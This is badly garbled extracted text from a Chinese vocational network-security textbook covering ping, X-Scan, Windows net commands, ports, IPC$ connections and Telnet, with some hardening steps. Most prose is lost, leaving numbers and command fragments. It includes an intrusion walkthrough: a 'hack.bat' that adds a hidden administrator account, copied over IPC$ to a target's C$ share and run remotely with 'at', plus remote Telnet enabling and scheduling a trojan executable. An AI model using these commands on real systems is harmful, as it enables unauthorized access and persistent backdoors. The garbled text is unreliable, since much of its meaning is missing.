科学出版社职教技术出版中心 www.aboo
中等职业教育 十一五 规划教材 中职中专计算机类教材系列 北京
内容简介本书内容按 任务驱动, 案例教学 思路组织, 注重培养学生实践能力, 案例丰富, 图文并茂, 主要内容包括 : 网络安全概述 网络安全基础技术 基于通信认证的安全 操作系统安全技术 防火墙应用技术 网络病毒防范与清除 黑客的攻击与防范 通过本书的学习, 读者可以轻松掌握计算机网络安全的基本知识 基本技术和应用 适合作为中专 技校 职高等职业技术学校计算机类相关专业教材, 还可供职业培训和计算机用户自学使用 图书在版编目 (CIP) 数据网络安全技术与实训 / 耿杰, 方风波主编. 北京 : 科学出版社,2008 ( 中等职业教育 十一五 规划教材 中职中专计算机类教材系列 ) ISBN 978-7-03-022358-6 Ⅰ. 网 Ⅱ.1 耿 2 方 Ⅲ. 计算机网络 - 安全技术 - 专业学校 - 教材 Ⅳ. TP393.08 中国版本图书馆 CIP 数据核字 (2008) 第 091228 号责任编辑 : 韩洁 / 责任校对 : 柏连海责任印制 : 吕春珉 / 封面设计 : 耕者设计工作室 出版北京东黄城根北街 16 号邮政编码 :100717 http://www.sciencep.com 印刷科学出版社发行各地新华书店经销 * 2008 年 7 月第一版 2008 年 7 月第一次印刷印数 :1 3 000 开本 :787 1092 1/16 印张 :11 字数 :246 000 定价 :18.00 元 ( 如有印装质量问题, 我社负责调换 < >) 销售部电话 010-62134988 编辑部电话 010-62138978-8203 ( 版权所有, 侵权必究 ) 举报电话 :010-64030229;010-64034315;13501151303 科学出版社职教技术出版中心 www.aboo
~ 科学出版社职教技术出版中心 www.aboo
... 1 1.1... 2 1.2... 3 1.1... 3 1.2... 4 1.3... 5 Ping... 5 1.3...12 1.4...13...15... 16... 16 X-Scan...17...22 2.1 DOS...23 2.1 DOS...23 2.2 DOS...23 2.2...29 2.3...29 2.4...30 2.1...32 2.3...35 2.5...35 2.6...36 2.2...36...40 2.1...40 2.2...40...41...41...42...52 3.1...53
iv 网络安全技术与实训 3.1 IPC Windows...53 3.2 BAT...54 3.1 BAT...55 3.2 IPC$...56 3.3 IPC$...59 3.2...60 3.3...60 3.4...60 3.5 Telnet...61 3.4 Telnet...62...65...66...66 Telnet...67...70 4.1...71 4.1...71 4.1...71 4.2...72 4.2 Windows 2000...73 4.2 Windows 2000...74 4.3 Windows 2000 NTFS...74 4.4 Windows 2000...74 4.3 Windows 2000...76 4.3 Windows 2000...80 4.5...80 4.6...81 4.7...81 4.4...82 Windows 2000...90...94...94 Windows 2000...96 科学出版社职教技术出版中心 www.aboo...98 5.1...99 5.1...99 5.2... 100 5.1... 101
目 录 v 5.2... 105 5.3... 105 5.4... 106 5.2... 108 5.3 BT... 110 5.4 21 80... 110... 111... 113... 113... 114... 121 6.1... 122 6.1 2008 05 03... 122 6.1... 122 6.2... 123 6.3... 124 6.4... 125 6.2... 126 6.5... 126 6.6... 127 6.7... 127 6.8... 130 6.2... 131... 134... 134... 135 360... 136... 142 7.1... 143 7.1... 143 7.1... 143 7.2... 144 7.2... 145 7.3... 145 7.4... 147 7.5... 149 7.2... 151 7.3... 157 v
vi 网络安全技术与实训 7.3... 157 7.6... 159 7.7... 160... 161... 162... 163... 164... 166 科学出版社职教技术出版中心 www.aboo
计算机网络安全基础知识 Ping X-Scan
2 网络安全技术与实训 1.1 Internet Web E-mail Internet 1996 8 14 Internet 1 1997 CITYBANK CITYBANK 1100 2003 ISP ISP 2007 9 21 300 260% 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 3 TCP/IP TCP/IP IC 1.2 1.1 4 1 2
4 网络安全技术与实训 3 4 1.2 1 2 3 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 5 4 5 1.3 Ping 案例分析 Ping Packet Internet Grope ICMP ICMP Ping -t Ping DOS Ping 目标 IP 地址 t Ping 192.168.0.6 t Ping IP 操作步骤 1 IP IP 1 mmc
6 网络安全技术与实训 1 1.1 图 1.1 控制台窗口 2 1.1 / / IP 1.2 图 1.2 添加 / 删除管理单元窗口 3 1 IP 1.3 IP 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 7 图 1.3 控制台根节点 2 IP IP IP 1 1.3 IP IP IP 2 IP Ping 1.4 图 1.4 IP 安全策略向导 窗口 3 4 ping 1.5
8 网络安全技术与实训 图 1.5 默认响应规则身份验证方法 5 IP IP 3 IP IP IP 1 IP IP 1.6 图 1.6 新 IP 安全策略属性 窗口 2 科学出版社职教技术出版中心 www.aboo 3 Ping 1.7 4
第 1 章计算机网络安全基础知识 9 Ping 1.8 图 1.7 选择 所有网络连接 项 图 1.8 身份验证方法 页面 5 IP IP 1.9 图 1.9 IP 筛选器列表 窗口
10 网络安全技术与实训 6 IP IP IP IP 1.10 图 1.10 IP 通信源 页面 7 IP IP Ping 1.11 图 1.11 IP 通信目标 页面 8 IP ICMP 1.12 9 IP 1.13 10 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 11 图 1.12 IP 协议类型 页面 图 1.13 筛选器操作 页面 4 IP IP 1.14 图 1.14 控制台根节点 中右击 新的 IP 安全策略 项
12 网络安全技术与实训 Ping IP Ping Ping Ping 1.3 1 D DOS Windows 3.x Windows 95 UNIX Windows NT C2 Windows 95 UNIX root Windows NT Administrator 2 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 13 1.4 1 2 Modem Internet Modem Internet
14 网络安全技术与实训 3 4 Internet Internet Java Applet Active X 5. 3 1 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 15 2 3 Windows Windows Linux Windows Windows Windows 1 2 3 20 80 1983 1985
16 网络安全技术与实训 1994 1985 4 8 A2 A1 B3 B2 B1 C2 C1 D A2 D GB17859 1999 5 1. 填空题 1 3 2 3 4 5 6 7 8 9 10 2. 选择题 1 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 17 A B C D 2 A D1 B A1 C C1 D C2 3 A B C D 4 A B C D 5 A B C D 3. 简答题 1 2 3 4 1 2 X-Scan 3 X-Scan 1 Internet 2 Windows NT/2000/XP 3 X-Scan 3.3
18 网络安全技术与实训 1 X-Scan 1.15 2 IP IP IP 192.168.0.1-192.168.0.255 1.16 图 1.15 X-Scan 主窗口 职教技术出版中心 www.aboo 图 1.16 扫描参数 窗口科学出版社
第 1 章计算机网络安全基础知识 19 3 1.17 HTML 1.18 图 1.17 扫描模块设置 图 1.18 扫描报告设置 Ping X-Scan X-Scan 1.19
20 网络安全技术与实训 图 1.19 其他设置 4 TCP SYN TCP SYN 1.20 图 1.20 端口相关设置 SNMP SNMP NETBIOS 图 1.21 加载漏洞脚本提示框 Windows NETBIOS CGI 科学出版社职教技术出版中心 www.aboo
第 1 章计算机网络安全基础知识 21 5 X-Scan 1.21 6 1.22 图 1.22 漏洞检测过程 7 1.23 图 1.23 漏洞检测结果
网络安全基础技术 DOS DOS 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 23 Windows 2.1 DOS 2.1 DOS DOS Windows Windows DOS Windows 2000 Windows XP Windows 2003 DOS cmd exe cmd cmd cmd.exe Windows Windows2000 Path cmd Telnet FTP dir cd Path Path 提示 Path 2.2 DOS 1 Ping 2.1 c \>ping 192.168.10.243 192.168.10.243 2.1 2 Ipconfig TCP/IP 2.2 c \>ipconfig TCP/IP 2.2
24 网络安全技术与实训 图 2.1 测试与主机 192.168.10.243 的连通性 图 2.2 查看当前主机 TCP/IP 协议的相关配置 3 Dir 2.3 c \>di C 2.3 职教技术出版中心 www.aboo 图 2.3 列出文件目录科学出版社
第 2 章网络安全基础技术 25 4 Md 2.4 c \>md wangluo C 2.4 5 Echo 图 2.4 在 C 盘根目录建立文件夹 2.5 1.TXT 2.5 你好! 我是中职的学生 C:\>echo C:\>echo 你好!>>1.txt 我是中职的学生 >>1.txt 图 2.5 建立文件名为 1.TXT 的文件 6 Type 2.6 c \>type 1.txt 1.txt 2.6 7 Del 2.7 c \>del 1.txt C 1.txt 2.7 图 2.6 显示 1.txt 文件内容 图 2.7 删除 C 盘的 1.txt
26 网络安全技术与实训 8 Net 1 Net user 2.8 1 1 2.8 1 1 2.9 net user 用户名密码 /add net user 1 1 /add 图 2.8 建立一个帐号为 1, 密码为 1 的用户 2 net stop 2.9 net stop telnet telnet 2.10 图 2.9 net user 命令执行结果 职教技术出版中心 www.aboo 2.10 telnet 科学出版社
第 2 章网络安全基础技术 27 3 net start 2.10 net start telnet telnet 2.11 图 2.11 启动 telnet 服务 4 net config 2.11 1 c \net config 2.12 2 c \net config workstation 3 c \net config server 图 2.12 显示当前主机运行的可配置服务 5 net localgroup 2.12 C \net localgroup 2.13 C \net use 2.14 C \net localgroup administrators 1 /add 2.13 2.15 c \ net localgroup administrators 1 /del 图 2.13 将用户名为 1 的权限提升为管理员权限
28 网络安全技术与实训 6 net share 2.16 c \>net share 2.14 2.17 c \> net share s=d \wanluo D wanluo S 图 2.14 查看当前计算机中共享资源 7 netstat -an 2.18 c \> netstat -an 2.15 8 at 图 2.15 查看系统当前开放的端口和连接 2.16 2.19 C \at 2.20 C \at \\192.168.0.70 科学出版社职教技术出版中心 www.aboo 20 50 D \muma.exe IP
第 2 章网络安全基础技术 29 2.21 C \at \\192.168.0.70 2.22 C \at \\192.168.0.70 192.168.0.70 192.168.0.70 图 2.16 在目标主机上添加一项计划服务 2.2 2.3 Internet TCP/IP IP Internet? Protocol Port 80 139 445 1 Internet TCP UDP TCP 80 UDP 80 1 0~1023 TCP 21 ftp 80 http 139 netbios UDP 7 echo 69 tftp
30 网络安全技术与实训 2 1024~49151 2 3 1 2 3 2.4 1 21 21 FTP File Transfer Protocol FTP FTP 21 21 2 23 Telnet Internet Telnet Telnet Telnet UNIX 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 31 Windows 2000 Telnet 23 3 25 SMTP Simple Mail Transfer Protocol SMTP 25 25 SMTP 25 WinSpy 25 SMTP 4 53 DNS Domain Name Server DNS NT DNS IP DNS DNS Web IP 53 10 DNS BIND 5 80 HTTP HyperText Transport Protocol WWW World Wide Web 80 80 6 109 110 109 POP2 Post Office Protocol Version 2 2 110 POP3 3 POP2 POP3 POP3 POP2 POP3 POP3 ISP POP3 110 POP2 POP3 POP3 20 110 ProMail trojan 110 POP 7 135 RPC Remote Procedure Call DCOM RPC DCOM HTTP Windows 2000 Windows XP RPC
32 网络安全技术与实训 8 137 NetBIOS Name Service NetBIOS UDP 137 IIS UDP IIS 9 139 NetBIOS Session Service Windows Unix Samba Windows 139 X-Scan 139 10 1024 Reserved 1024 1024 YAI 1024 YAI YAI 11 8080 8080 80 WWW 8080 Brown Orifice BrO 8080 80 2.1 案例分析 Telnet 23 FTP 21 SMTP 25 RPC 135 / 操作步骤 科学出版社职教技术出版中心 www.aboo 1 Windows 2000/XP/2003 Netstat
第 2 章网络安全基础技术 33 1 cmd 2 netstat an TCP UDP 2.17 图 2.17 查看端口状态 2 Windows 2000/XP Telnet 23 1 Telnet 2.18 图 2.18 Telnet 服务
34 网络安全技术与实训 2 Telnet 2.19 3 23 23 3 NetBIOS 139 Internet NetBIOS 139 1 Internet TCP/IP 2.20 图 2.19 启动或停止 Telnet 服务 图 2.20 本地连接属性 对话框 2 Internet TCP/IP 2.21 图 2.21 Internet 协议 (TCP/IP) 属性 对话框 科学出版社职教技术出版中心 www.aboo 3 TCP/IP WINS
第 2 章网络安全基础技术 35 TCP/IP NetBIOS 2.22 图 2.22 禁用 TCP/IP 上的 NetBIOS Netstat_an 139 2.23 图 2.23 已经关闭了 139 端口 2.3 2.5 / Web
36 网络安全技术与实训 Windows 2000 2.6 DLL 提 示 2.2 案例分析 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 37 操作步骤 1 2.24 图 2.24 服务 窗口 2 Server 1 services Msc Enter Server 2.25 2 Server 2.26 3 2.27
38 网络安全技术与实训 图 2.25 选中 Server 选项 图 2.26 Server 的属性 ( 本地计算机 ) 对话框 图 2.27 启动 按钮被激活 4 2.28 图 2.28 服务控制 对话框 5 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 39 提示 Server 提示 3 Server 1 Server Server 2.29 2 3 2.30 图 2.29 故障恢复 选项卡 图 2.30 选择 重新启动服务 选项
40 网络安全技术与实训 3 1 提示 Windows Windows Windows recycled attrib C \recycled winfile attrib COPY HKEY LOCAL MACHINE \Software\Microsoft\CurrentVersion\ersion\Advanced\Folder\Hidden\SHOWALL CheckedValue dword 0 Windows C \recycled SID SID b a SID s-1-5-21-872626158-1561752855-879972363-1005 a server b a C \recycled S-1-5-21-872626158 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 41 156175 2855-879972363-1005 a C \ a b Windows 2000 Windows NT Intel Alpha Windows 1 Windows 2000 cmd 2 Ipconfig 3 Type 4 FTP 5 Web 6 Del 7 At 8 9 10 80 2. 选择题 1 Ping A B MAC C DNS IP D 2 A HTTPB B FTP b C TELNETD D SSL 3 A B
42 网络安全技术与实训 C D 4 A B C D 5 A B C D 3. 简答题 1 2 3 1 2 1 Internet 2 Windows NT/2000/XP 1 7.9 1 Simptcp 2.31 2 Simptcp 2.32 3 7 9 7 9 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 43 2 21 1 FTP 2.33 2.31 Simptcp 图 2.32 打开 Simptcp 服务属性窗口
44 网络安全技术与实训 图 2. 33 找到 FTP 服务 2 FTP 2.34 图 2.34 打开 FTP 服务属性窗口 3 21 21 3 23 1 Telnet 2.35 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 45 图 2.35 Telnet 服务 2 Telnet 2.36 图 2.36 启动或停止 Telnet 服务 3 23 23 4 25 1 SMTP 2.37
46 网络安全技术与实训 图 2.37 找到 SMTP 服务 2 SMTP 2.38 3 25 25 5 80 图 2.38 打开 SMTP 服务属性窗口 1 WWW 2.39 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 47 图 2.39 找到 WWW 服务 2 WWW 2.40 3 80 80 6 137 138 445 1 2.41 图 2.40 打开 WWW 服务属性窗口
48 网络安全技术与实训 图 2.41 打开 本地连接属性 对话框 2 Microsoft 445 Microsoft 137 138 2.42 7 NetBIOS 139 Internet NetBIOS 139 1 Internet TCP/IP 2.43 图 2.42 关掉了 137 138 端口 科学出版社职教技术出版中心 www.aboo 图 2.43 本地连接 3 属性 对话框
第 2 章网络安全基础技术 49 2 Internet TCP/IP 2.44 图 2.44 Internet 协议 (TCP/IP) 属性 对话框 3 TCP/IP WINS TCP/IP NetBIOS 2.45 图 2.45 禁用 TCP/IP 上的 NetBIOS Netstat 139 2.46
50 网络安全技术与实训 图 2.46 已经关闭了 139 端口 8 3389 3389 Terminal Service Windows 1 2.47 图 2.47 打开 系统属性 窗口 2 2.48 科学出版社职教技术出版中心 www.aboo
第 2 章网络安全基础技术 51 图 2.48 去掉 远程协助 和 远程桌面 两个选项框里的勾选
基于通信认证的安全 IPC Windows IPC Windows Telnet IPC Windows Telnet 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 53 / / / 3.1 3.1 IPC Windows 1 IPC Internet Process Connection IPC Windows IPC $ Windows IPC$ IPC IPC$ Windows NT Windows 2000/XP/2003 IPC IPC IPC IPC IPC$ IPC$ IPC IPC 2 IPC Windows Windows 98 C D E C:\WINNT\ C:\Windows C$ D$ E$ ADMIN$ MS-DOS net share 3.1
54 网络安全技术与实训 3 IPC$ IPC$ IPC$ 4 3.2 BAT 1 BAT BAT Windows DOS BAT DOS BAT DOS 2 10 10 10 Windows 3.2 职教技术出版中心 www.aboo 科学出版社
第 3 章基于通信认证的安全 55 3.1 BAT 操作步骤 1 BAT net user sysback 123456 /add net localgroup administrators sysback /add 3.3 hack.bat 提 示 net user sysback 123456 /add sysback 123456 sysback 123456 /add net localgroup administrators sysback/add 命令表示把 sysback 添加到管理员组 administrators 其中, administrators 表示管理员组, sysback 表示刚建立的用户名, /add 表示添加帐号 2 IPC$ net use \\192.168.1.108\ipc$ 3 MS-DOS copy hack.bat \\192.168.1.108\c$ 3.4 copy hack.bat 192.168.1.108 C
56 网络安全技术与实训 提示 hack.bat 4 hack.bat MS-DOS net time \\192.168.1.108 3.5 3.5 02:59 at \\192.168.1.108 13:02 c:\hack.bat 3.6 1 02 C hack.bat net use * /del IPC$ hack.bat IPC$ sysback sysback 3.2 IPC$ 案例分析 IPC$ IPC$ 操作步骤 1 CMD 3.7 2 IPC$ net use \\192.168.1.108\ipc$ 3.8 3 net use z: \\192.168.1.108\c$ 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 57 \\192.168.1.108\c$ 192.168.1.108 C $ z: C 192.168.1.108 C Z 3.9 Z 192.168.1.108 C$ C 3.10 4 Z 3.11
58 网络安全技术与实训 5 net use * /del IPC$ * /Del 3.12 $ net use \\ IP\ /del IP 3.13 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 59 3.3 IPC$ 案例分析 IPC$ IPC$ IPC$ IPC$ 操作步骤 1 net share 2 BAT BAT BAT noshare.bat net share ipc$ /del net share admin$ /del net share c$ /del net share d$ /del BAT net share net share IPC$ IPC$ 3 Server Server IPC$ Server IPC$ Server IPC$ IPC$ 4 IPC$ IPC$ HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control LSA Restrict Anonymous =DWORD 00000001 2 2 X-Scan
60 网络安全技术与实训 X-Scan 提 示 DOS Server net stop server/y Server Server 3.2 3.3 IPC$ Windows Windows 1 2 Windows 2000 1 2 3 4 5 6 7 DNS DHCP 提示 Administrator 3.4 Administrator 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 61 IPC$ 1 IP 2 IPC$ IPC$ IP 3 3.5 Telnet Telnet 1 Telnet Telnet Telnet Telnet Telnet 2 Telnet Telnet IPC$ net time at Telnet Telnet Telnet Telnet
62 网络安全技术与实训 IPC$ Telnet 3 Telnet telnet IP [Port] IP Telnet IP PORT Telnet 23 23 Telnet 192.168.0.1 Telnet 192.168.0.1 23 3.4 Telnet 操作步骤 1 IPC$ IPC$ 192.168.1.108 2 A C 3.14 科学出版社职教技术出版中心 www.aboo IP 192.168.1.108 3.15 IPC$
第 3 章基于通信认证的安全 63 3 Task Scheduler 3.16 4 3.16 Task Scheduler 3.17 Task Scheduler, 3.18
64 网络安全技术与实训 5 Task Scheduler S Task Scheduler 1 2 3 6 Telnet Telnet 3.19 7 3.19 Telnet Telnet 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 65 3.20 8 IPC$ IPC$ net use * /del net use \\192.168.1.108\ IPC$ /del IPC$ DOS BAT DOS
66 网络安全技术与实训 Windows 3.x DOS Win.ini System.ini Control.ini program.ini INI DOS Windows 3.x PC Windows 95 Windows 95 WinNT IPC$ Telnet IPC$ IPC$ Telnet 1. 填空题 1 2 IPC$ $ Windows 3 DOS 4 BAT 5 6 Administrators 7 IPC Windows 8 IPC$ 9 10 Telnet 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 67 2. 选择题 1 A B C PKI D 2 A B C D 3 A B C D 3. 简答题 1 IPC Windows 2 3 BAT 4 Telnet Telnet 1 2 Telnet 1 2 Windows NT/2000 1 IPC$ X-scan administrator 3.21
68 网络安全技术与实训 $ 2 Telnet 3.22 Telnet 3 IPC$ 3.23 $ 4 MS-DOS MS-DOS Telnet 3.24 科学出版社职教技术出版中心 www.aboo
第 3 章基于通信认证的安全 69 5 telnet 10.10.30.71 y 3.25 3.26 6 3.26 Telnet Shell Shell net user 3.27